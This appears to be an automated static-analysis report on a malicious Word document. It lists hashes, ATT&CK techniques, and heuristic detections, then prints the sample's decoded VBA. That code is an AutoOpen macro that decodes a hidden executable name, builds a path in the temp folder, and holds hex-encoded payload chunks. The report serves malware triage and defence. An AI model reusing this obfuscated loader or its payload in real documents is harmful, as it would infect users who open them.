Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6b424d75445b3dab…

MALICIOUS

Office (OLE)

Size: 7.07 MB
Created: 2018-03-01 17:44:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 233ad743dd26c959fa735ffbaa456c05
SHA-1: e47f845c3ba2c487ccc8319c36de1587592ac0d6
SHA-256: 6b424d75445b3dabfb9b20895d0a1ce1430066ce7f3fcd87aa41fa32260ff92d
Risk score: 212

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1140 Deobfuscate/Decode Files or Information
  • T1204.002 User Execution: Malicious File

The sample is a Microsoft Office document containing heavily obfuscated VBA macros. The AutoOpen macro decodes a string that, once decoded, appears to be the filename 'SvoujnfCsplfs.exe', and concatenates it with the user's temporary directory to form a full path for execution. This indicates that the macro's primary purpose is to download and execute a second-stage payload.

Heuristics (8)

  • VBA macros detected [medium; 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro present.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call present.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (environment variable access) [low] OLE_VBA_ENVIRON
    Environ() call present.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3815369 bytes
SHA-256: ef0d668efdf32feece8ec0f1bea13562c7f8286b97a9d07faeb89720b87309a4

Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1960 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    
    ' Suppress runtime errors by jumping to the gaqz label (not shown in this preview)
    On Error GoTo gaqz
    
    ' Obfuscated filename: every character is stored shifted up by one code point
    liveOn = "SvoujnfCsplfs/fyf"
    
    ' Build the target path under %TEMP%, decoding one character at a time with Chr(Asc(c) - 1)
    liveOff = Environ("temp") + "\"
    For qnx = 1 To Len(liveOn)
        liveOff = liveOff + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)
    Next
    
    ' 431 string slots that hold the hex-encoded payload chunks reassembled later
    Dim str(430) As String

    str(2) = "E7F7E7E7E735E5E7E7E3E7E7E7E7E7E7E7E7E7E7E7E7E7E7C7E7E787C99583869386E7E76DB3E7E7E717E5E7E7B1E7E7E731E5E7E7E7E7E7E7E7E7E7E7E7E7E7A7E7E7A7C983869386E7E7E76BB9E7E7E7B7E4E7E7E5E7E7E7CBE4E7E7E7E7E7E7E7E7E7E7E7E7E7A7E7E727C995949584E7E7E753E6E7E7E757E4E7E7E5E7E7E7C9E4E7E7E7E7E7E7E7E7E7E7E7E7E7A7E7E7A7C995828B8884E7E791F2E7E7E727E4E7E7F1E7E7E7D7E4E7E7E7E7E7E7E7E7E7E7E7E7E7A7E7E7A5E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7E7"
    str(4) = "90DB621193CDB10F7FFCE6E76423E36AA1B7B718F21317A5E7469342A4E7B1622793EF18376423E3B9BC2418346423E3B9BC242B6CA0DFB46CFA4316A5E7B16CD29342A4E7622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0AF622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0DB622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0AB622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0A7622793F3B7621193ED18316CD29342A4E70CE518346423E36CA0B7622793F5B7621193EF18316423E3B9BC2
... (truncated)